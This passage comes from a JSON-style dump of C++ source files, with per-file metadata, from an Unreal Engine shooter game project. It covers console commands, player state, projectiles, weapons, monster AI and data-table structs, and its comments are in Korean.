IConsoleVariable* pConsoleVariable);\n\tvirtual void UpdateCommand() = 0;\t\t// 매 틱마다 커맨드가 업데이트 되었는지 확인한다.\n\tvirtual void Excute() = 0;\t\t\t\t// 커맨드 실행\n\tvirtual void OnChangeCommand() = 0;\t\t// 해당 커맨드가 입력이 되었음을 알린다.\n\n\tclass IConsoleVariable* GetConsoleVariable() { return m_pConsoleVariable; }\n\npublic:\n\tstatic void OnUpdateConsoleValue(IConsoleVariable* pConsoleVariable);\n\t\nprotected :\n\tclass IConsoleVariable*\t\tm_pConsoleVariable = nullptr;\n\nprivate :\n\tFConsoleVariableDelegate\tOnConsoleVariableDelegate;\n};\n" }, { "alpha_fraction": 0.7363636493682861, "alphanum_fraction": 0.7363636493682861, "avg_line_length": 17.33333396911621, "blob_id": "1db1098cb4e82c6624b7c81d6cf0b23a73ae18ed", "content_id": "ce11fd008d3834787f100ef932925733f044ea7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 442, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Public/Game/Console/Commands/PG_CommandStartStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"PG_Command.h\"\n\n/**\n * \n */\nclass PG_CommandStartStage : public PG_Command\n{\npublic:\n\tPG_CommandStartStage();\n\t~PG_CommandStartStage();\n\npublic:\n\tvirtual void UpdateCommand() override;\n\tvirtual void Excute() override;\n\tvirtual void OnChangeCommand() override;\n\nprivate:\n\tbool bOnCommand = false;\n};\n" }, { "alpha_fraction": 0.6181702613830566, "alphanum_fraction": 0.6194409132003784, "avg_line_length": 29.269229888916016, "blob_id": "c018aafb58d45ac6d27dcf9445ccbd9f7115bb02", "content_id": "a8475b5c6b83d5f6157b9d633c1e6ee6950dce69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1696, "license_type": "no_license", "max_line_length": 122, "num_lines": 52, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentDash.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentDash.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnDashEnd);\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentDash : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's properties\n\tUPG_ComponentDash();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\t//====================================================================\n\t// vDashTargetPos : 대쉬 할 타겟의 위치\n\t// fRunTime : 대쉬 최종 목표지점까지 이동시간\n\t//====================================================================\n\tbool SetupDashData(FVector vDashTargetPos, float fMoveDistance, float fDashSpeed);\n\n\t//====================================================================\n\t// StartDash() 함수 이용전 반드시 SetupDashData() 함수로 데이터 설정 후 사용할 것\n\t//====================================================================\n\tvoid StartDash();\n\tvoid StopDash();\n\tbool IsDash();\n\npublic :\n\tFOnDashEnd OnDashEnd;\n\nprivate :\n\tvoid UpdateDashLocation(float fDeltaTime);\n\nprivate :\n\tbool\tm_bActiveDash = false;\t\t\t\t// 대쉬중 여부\n\tfloat\tm_fDashSpeed = 0.0f;\n\tFVector m_vDashDir = FVector::ZeroVector;\t// 대쉬방향 (Nomalize)\n\tFVector m_vGoalPos = FVector::ZeroVector;\t// 최종 이동 목표지점\n};\n" }, { "alpha_fraction": 0.5385427474975586, "alphanum_fraction": 0.5422386527061462, "avg_line_length": 36.50495147705078, "blob_id": "534268ed2fca3d6240e4dd94b94e569e39814d6e", "content_id": "4261def8888255db10d7397efb7209d62c0e89bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4376, "license_type": "no_license", "max_line_length": 110, "num_lines": 101, "path": "/Source/Project_Gun/Public/Player/PlayerState/PG_MyPlayerState.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/PlayerState.h>\n#include \"PG_MyPlayerState.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnUpdateRewardPoint);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnAddRewardPoint, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnMonsterKill, class APG_MonChar*);\nDECLARE_MULTICAST_DELEGATE(FOnReadyToUseTheLethalAttack);\nDECLARE_MULTICAST_DELEGATE(FOnTryUseTheLethalAttack);\nDECLARE_MULTICAST_DELEGATE(FOnUseTheLethalAttackFail);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnChangeWeapon, int32);\n\n/**\n * PlayerState : 플레이어의 상태를 정의한다. 플레이어의 캐릭터가 무슨 직업인지, 이름은 무엇인지 등을 포함한다.\n * -. 남들이 알아야하는 내 정보 (멀티플레이 환경에 의미가 더 도드라진다)\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MyPlayerState : public APlayerState\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MyPlayerState();\n\t\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\n\npublic :\n\tbool InitPlayerData();\t\t// 스테이지 시작전 플레이어 데이터를 초기화한다.\n\n\t//==========================================================\n\t// Reward Point\n\t//==========================================================\n\tvoid AddRewardPoint(int32 a_nAddPoint);\n\tvoid SetRewardPoint(int32 a_nSetPoint);\n\tUFUNCTION(BlueprintCallable, Category = \"PG RewardPoint\")\n\tint32 GetRewardPoint() { return m_kPlayingPlayerData.RewardPoint; }\n\n\t//==========================================================\n\t// PlayerData\n\t//==========================================================\n\tconst FPGPlayerData* GetOriginalPlayerData() { return &m_kOrignalPlayerData; }\t\t// 스테이지 플레이하기전 오리지널 플레이어 데이터\n\tconst FPGPlayerData* GetPlayingPlayerData() { return &m_kPlayingPlayerData; }\t\t// 스테이지 플레이 시작 후 변경되는 플레이어 데이터\n\n\t//==========================================================\n\t// Monster\n\t//==========================================================\n\tvoid MonsterKill(class APG_MonChar* KillMon);\n\tvoid MonsterLethalAttackKill(class APG_MonChar* KillMon);\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tbool UseAmmo();\t\t\t\t\t// 현재 장찬된 무기의 탄약 소비\n\tvoid ChangeDefaultWeapon();\t\t// 기본 무기로 변경\n\tbool ChangeWeapon(int32 nSlotIndex, int32 nWeaponTableIndex);\t// 무기 변경\n\n\t//==========================================================\n\t// Lethal Attack\n\t//==========================================================\n\tvoid ReadyToUseTheSkill();\t\t// 필살기 사용 준비\n\tvoid TryUseTheSkill();\t\t\t// 필살기 사용 시도\n\npublic :\n\t//==========================================================\n\t// Point\n\t//==========================================================\n\tFOnUpdateRewardPoint\tOnUpdateRewardPoint;\t\t\t// 포인트 획득 (몬스터 킬 + 스테이지 클리어 획득 재화 포함)\n\tFOnAddRewardPoint\t\tOnKillAddRewardPoint;\t\t\t// 몬스터 처치로 인한 포인트 획득 (스테이지 클리어 획득 재화 미포함)\n\n\t//==========================================================\n\t// Monster\n\t//==========================================================\n\tFOnMonsterKill\t\t\tOnDefaultAttackMonsterKill;\t\t// 일반공격으로 인한 몬스터 처치\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tFOnReadyToUseTheLethalAttack\tOnReadyToUseTheLethalAttack;\t// 스킬 사용 준비\n\tFOnTryUseTheLethalAttack\t\tOnTryUseTheLethalAttack;\t\t// 스킬 사용 시도\n\tFOnUseTheLethalAttackFail\t\tOnUseTheLethalAttackFail;\t\t// 스킬 사용 실패\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tFOnChangeWeapon OnChangeWeapon;\t\t// 무기 교체 알림\n\nprotected :\n\t// 스테이지 플레이중 변경되는 플레이어 데이터\n\tUPROPERTY(Transient, VisibleAnywhere)\n\tstruct FPGPlayerData m_kPlayingPlayerData;\n\n\t// 스테이지 시작시 변하지 않는 원본 플레이어 데이터\n\tUPROPERTY(Transient, VisibleAnywhere)\n\tstruct FPGPlayerData m_kOrignalPlayerData;\n};\n" }, { "alpha_fraction": 0.7630103826522827, "alphanum_fraction": 0.7710168361663818, "avg_line_length": 23.019229888916016, "blob_id": "a3c8fdaf642282bdfa1676ba8d7fe85e6f3ce39c", "content_id": "8f9c88c3301dc0c811bc9f40f1049bcc21b3aec8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayMissionState.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetPlayMissionState.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayMissionState : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid UpdateMissionFlag();\n\tvoid UpdateMissionLethal();\n\tvoid UpdateMissionTime();\n\n\tvoid SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue);\n\tvoid SetDataTime(bool bClear, int32 nCurrTime);\n\nprotected:\n\t// 현재 몬스터 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateFlag();\n\t// 몬스터 필살기 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateLethal();\n\t// 타이머 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateTime();\n\nprotected:\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrLethal);\n\tPG_WIDGET_DECLAR(UTextBlock, TextCurrTime);\n\n\tPG_WIDGET_DECLAR(UTextBlock, TextMaxFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMaxLethal);\n};\n" }, { "alpha_fraction": 0.7993355393409729, "alphanum_fraction": 0.8011074066162109, "avg_line_length": 36.00819778442383, "blob_id": "1dc23f1d68ec6f9bf10f5a9596926523830696cc", "content_id": "2a8846b2c7d97557235d3c23f0d55499fb1f0054", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4723, "license_type": "no_license", "max_line_length": 204, "num_lines": 122, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileRifle.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileRifle.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MyChar.h\"\n\n// Sets default values\nAPG_ProjectileRifle::APG_ProjectileRifle()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tProjectileMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"ProjectileMeshComponent\"));\n\tProjectileMeshComponent->SetupAttachment(CollisionComponent);\n\tProjectileMeshComponent->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\t// 이 컴포넌트를 사용하여 이 프로젝타일의 무브먼트를 구동시킵니다.\n\tProjectileMovementComponent = CreateDefaultSubobject<UProjectileMovementComponent>(TEXT(\"ProjectileMovementComponent\"));\n\tProjectileMovementComponent->SetUpdatedComponent(CollisionComponent);\n\n\t// 객체에 충돌시 발생되는 피격 이펙트\n\tBurstingEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"BurstingEffect\"));\n\tBurstingEffect->SetupAttachment(CollisionComponent);\n\tBurstingEffect->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\tBurstingEffect->bAutoActivate = false;\n}\n\nvoid APG_ProjectileRifle::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != ProjectileMovementComponent);\n\tProjectileMovementComponent->InitialSpeed = 0.0f;\n\tProjectileMovementComponent->MaxSpeed = 0.0f;\n\tProjectileMovementComponent->bRotationFollowsVelocity = true;\n\tProjectileMovementComponent->bShouldBounce = false;\n\tProjectileMovementComponent->Bounciness = 0.3f;\n\n\t// 플레이어 오버랩 이벤트 설정\n\tABCHECK(nullptr != CollisionComponent);\n\tCollisionComponent->SetGenerateOverlapEvents(true);\n\tCollisionComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileRifle::OnTargetBeginOverlap);\n\tCollisionComponent->OnComponentHit.AddDynamic(this, &APG_ProjectileRifle::OnTargetHit);\n\n\t// 총알 충돌 이펙트 설정\n\tABCHECK(nullptr != BurstingEffect);\n\tBurstingEffect->SetActive(false, true);\n\tBurstingEffect->OnSystemFinished.AddDynamic(this, &APG_ProjectileRifle::OnPlayEndParticle);\n}\n\n// Called when the game starts or when spawned\nvoid APG_ProjectileRifle::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n// 프로젝타일의 속도를 발사 방향으로 초기화시키는 함수입니다.\nvoid APG_ProjectileRifle::FireInDirection(const FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != ProjectileMovementComponent);\n\tWeaponData = *pWeaponData;\n\n\tProjectileMovementComponent->InitialSpeed = WeaponData.BulletSpeed;\n\tProjectileMovementComponent->MaxSpeed = WeaponData.BulletSpeed;\n\tProjectileMovementComponent->Velocity = ShootDirection * WeaponData.BulletSpeed;\n\n\t{\n\t\tFName CollisionName = bMonsterWeapon ? TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\t\tif (CollisionComponent)\n\t\t\tCollisionComponent->SetCollisionProfileName(CollisionName);\n\n\t\t//if (ProjectileMeshComponent)\n\t\t//\tProjectileMeshComponent->SetCollisionProfileName(CollisionName);\n\n\t\t//if (BurstingEffect)\n\t\t//\tBurstingEffect->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileRifle::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto pOwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != pOwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto pMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (pMonCharacter && IsOwnerMyPlayer())\n\t\tpMonCharacter->OnDamage(pOwnerWeapon->GetWeaponAttackDamage());\n\n\t// 플레이어 충돌시\n\tauto pMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (pMyCharacter && IsOwnerMonster())\n\t\tpMyCharacter->OnAttackedByMonster();\n\n\tif (BurstingEffect && false == BurstingEffect->IsActive())\n\t\tBurstingEffect->SetActive(true, true);\n\n\tif (WeaponData.Collide)\n\t{\n\t\tProjectileMovementComponent->StopMovementImmediately();\n\t\tProjectileMeshComponent->SetVisibility(false);\n\t\tCollisionComponent->SetCollisionEnabled(ECollisionEnabled::NoCollision);\n\t}\n}\n\nvoid APG_ProjectileRifle::OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tif (BurstingEffect && false == BurstingEffect->IsActive())\n\t\tBurstingEffect->SetActive(true, true);\n}\n\nvoid APG_ProjectileRifle::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}\n" }, { "alpha_fraction": 0.7343173623085022, "alphanum_fraction": 0.7343173623085022, "avg_line_length": 19.325000762939453, "blob_id": "28b31473b5eba40862a48ff962cf90f6f832b7c8", "content_id": "50bdf45f428c6f8295ec77694716bff92fef61ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 881, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/Source/Project_Gun/Public/AI/PG_AICon_Mon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <AIController.h>\n#include \"PG_AICon_Mon.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_AICon_Mon : public AAIController\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_AICon_Mon();\n\tvirtual void OnPossess(APawn* InPawn) override;\n\t//virtual void UnPossess() override;\n\n\tstatic const FName HomePosKey;\n\tstatic const FName TargetKey;\t\t// 캐릭터 타겟\n\tstatic const FName DetectRangeKey;\t// 몬스터가 캐릭터 인식하는 거리\n\tstatic const FName ChaseRangeKey;\t// 몬스터가 캐릭터 쫓아오는 최대 거리\n\n\tvirtual bool RunAI();\n\tvirtual void StopAI();\n\nprivate :\n\tbool SetBlackboardValue();\n\nprotected:\n\tUPROPERTY()\n\tclass UBehaviorTree* BTAsset = nullptr;\n\n\tUPROPERTY()\n\tclass UBlackboardData* BBAsset = nullptr;\n};\n" }, { "alpha_fraction": 0.7359667420387268, "alphanum_fraction": 0.7359667420387268, "avg_line_length": 17.5, "blob_id": "23cc0c4e186884fab0d7e156007726577dcbe871", "content_id": "15e5ca6aae4b2880fc8cf7eccf1f43c4d3f60342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 483, "license_type": "no_license", "max_line_length": 79, "num_lines": 26, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponRifle.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponRifle.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponRifle : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_WeaponRifle();\n\t\n\tvirtual void PostInitializeComponents() override;\n\npublic :\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n};\n" }, { "alpha_fraction": 0.760617733001709, "alphanum_fraction": 0.760617733001709, "avg_line_length": 20.54166603088379, "blob_id": "9dd4e149065a446166c7a4ddd0832d42a6be4a6e", "content_id": "8583f7549090acca3b1f3893bfba0e00139093e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 520, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Private/Character/PG_MonCharNormal.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharNormal.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharNormal::APG_MonCharNormal()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharNormal::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n}\n\nvoid APG_MonCharNormal::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterNormalData;\n}\n\n" }, { "alpha_fraction": 0.7369632124900818, "alphanum_fraction": 0.7434815764427185, "avg_line_length": 22.495494842529297, "blob_id": "fb9065763c5efaf3657ab675c17c8a608630e25c", "content_id": "6b11df961ff5dd49807cbd7944bdd7ff3913489a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2710, "license_type": "no_license", "max_line_length": 99, "num_lines": 111, "path": "/Source/Project_Gun/Public/Game/GameInstance/PG_GameInstance.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/Console/PG_Console.h\"\n#include \"Game/AD/PG_ADData.h\"\n\n#include <Engine/DataTable.h>\n#include <Engine/GameInstance.h>\n#include <Engine/StreamableManager.h>\n#include \"PG_GameInstance.generated.h\"\n\n/**\n * \n */\n\nUCLASS()\nclass PROJECT_GUN_API UPG_GameInstance : public UGameInstance\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_GameInstance();\n\n\tvirtual void Init() override;\n\tvirtual void Shutdown() override;\n\n\t// From GameMode Tick()\n\tvoid FromGameModeTick(float DeltaTime);\n\n\npublic :\n\t//void StartGame_NextStage();\n\t//void RestartGame();\n\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool OnNextSelectStage();\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool OnPrevSelectStage();\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool SetPlayStageID(int32 nPlayStageID);\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//int32 GetPlayStageID()\t{ return PalyStageID; }\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool StartGame();\n\n\npublic :\n\t// 캐릭터\n\tFPGCharacterMovementData*\tGetTableCharacterMovementData();\n\tFPGCharacterCameraData*\t\tGetTableCharacterCameraData();\n\n\t// 무기 샵\n\tconst FPGWeaponTableData*\tGetWeaponTableData(int32 nIndex);\n\tconst bool\t\t\t\t\tGetAllWeaponTableData(OUT TArray<const FPGWeaponTableData*>& a_rkWeaponTableDatas);\n\n\t// 스테이지\n\tconst FPGStageData*\t\t\tGetTableStageData(int32 nID);\n\tconst bool\t\t\t\t\tGetAllTableStageData(OUT TArray<const FPGStageData*>& a_rkStageDatas);\n\n\t// 필살기\n\tconst FPGLethalAttackData*\tGetTableLethalAttackData(int32 nID);\n\n\t// 광고\n\tconst FPGADTableData*\t\tGetADTableData(EADType eADType);\n\tint32\t\t\t\t\t\tGetADRemainTime(EADType eADType);\n\tbool\t\t\t\t\t\tIsAbleADView(EADType eADType);\n\tvoid\t\t\t\t\t\tResetADRemainTime(EADType eADType);\n\n\t// 콘솔\n\tclass PG_Console*\t\t\tGetConsole()\t{ return &m_kConsole; }\n\nprivate :\n\tbool LoadTable();\n\tbool LoadConsoleCommand();\n\npublic :\n\tFStreamableManager StreamableManager;\n\n\t//int32 PalyStageID; // 첫번째 스테이지의 ID 값은 1부터 시작한다.\n\tFString GetStageName(int32 StageID);\n\nprivate :\n\t// 테이블 클래스 정리 필요..\n\tUPROPERTY()\n\tclass UDataTable* m_pCharacterMovementTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pCharacterCameraTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pWeaponTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pLethalAttackTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pStageTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pADTable = nullptr;\n\n\t// 콘솔 명령어\n\tclass PG_Console m_kConsole;\n\n\t// 광고\n\tclass PG_ADData m_kADData;\n\n\n};\n" }, { "alpha_fraction": 0.6530153751373291, "alphanum_fraction": 0.6688170433044434, "avg_line_length": 28.230932235717773, "blob_id": "c0212ed3193549b54e539e7ade55445ebf18abb0", "content_id": "948d7b6b3b76cd8d219a9df52bd194d77cc5a465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16130, "license_type": "no_license", "max_line_length": 172, "num_lines": 472, "path": "/Source/Project_Gun/Public/Define/PG_TableData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Engine/DataTable.h>\n#include \"PG_TableData.generated.h\"\n\n#define PG_INVALID_INDEX\t\t-1\n#define PG_INFINITY_AMMO\t\t-1\t\t// 무한 총알\n#define PG_MAX_WEAPON_SLOT\t\t3\t\t// 무기 최대 장착 수\n#define PG_ADVIEW_REWARD\t\t3\t\t// 광고 보상 배수\n#define PG_ADVIEW_SHOP_REWARD\t200\t\t// 무기고에서 광고 보았을 때 보상 포인트\n\n//=========================================================================================\n// 캐릭터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGCharacterMovementData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGCharacterMovementData() : MaxSpeed(0.0f), AccelerationSpeed(0.0f), BodyRotateSpeed(0.0f)\n\t\t, AttackBodyRotateSpeed(0.0f), AttackUpperBodyRotateSpeed(0.0f)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tMaxSpeed;\t\t\t\t\t\t// 최대 이동속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAccelerationSpeed;\t\t\t\t// 이동 가속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tBodyRotateSpeed;\t\t\t\t// 이동시 캐릭터 회전속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAttackBodyRotateSpeed;\t\t\t// 공격시 캐릭터 회전속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAttackUpperBodyRotateSpeed;\t\t// 공격시 상체 회전속도\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGCharacterCameraData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGCharacterCameraData() : Pitch(-45.0f), Yaw(0.0f), Roll(0.0f), ArmLength(0.0f), Fov(0.0f), ScreenY(0.0f)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tPitch;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tYaw;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tRoll;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tArmLength;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tFov;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tScreenY;\n};\n\n//=========================================================================================\n// 몬스터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData() : ID(0), MHP(0), MSpeed(0.0f), MAcceleration(0.0f), MRotateSpeed(0.0f), MBodyScale(1.0f), MDetectRange(0), MChaseRange(0), MDropRate(0.0f), MCollide(true)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tID;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMHP;\t\t\t\t// 몬스터 체력\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMSpeed;\t\t\t\t// 몬스터의 이동 속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMAcceleration;\t\t// 몬스터 이동 가속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMRotateSpeed;\t\t// 몬스터가 캐릭터를 바라보기 위해 몸을 돌리는 속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMBodyScale;\t\t\t// 몬스터의 체력에 따른 몸체의 크기\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMDetectRange;\t\t// 몬스터가 플레이어 캐릭터를 인식하는 거리 (시야)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMChaseRange;\t\t// 몬스터가 플레이어 캐릭터를 쫓아오는 최대 거리\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMDropRate;\t\t\t// 몬스터가 재화를 드랍하는 확률\n\n\t\t//UPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\t\t//enum\tMBeHit;\t\t\t\t// 몬스터가 피격당할 때 발생할 효과 (0 : 없음, 1: 피격 위치 기준 뒤로 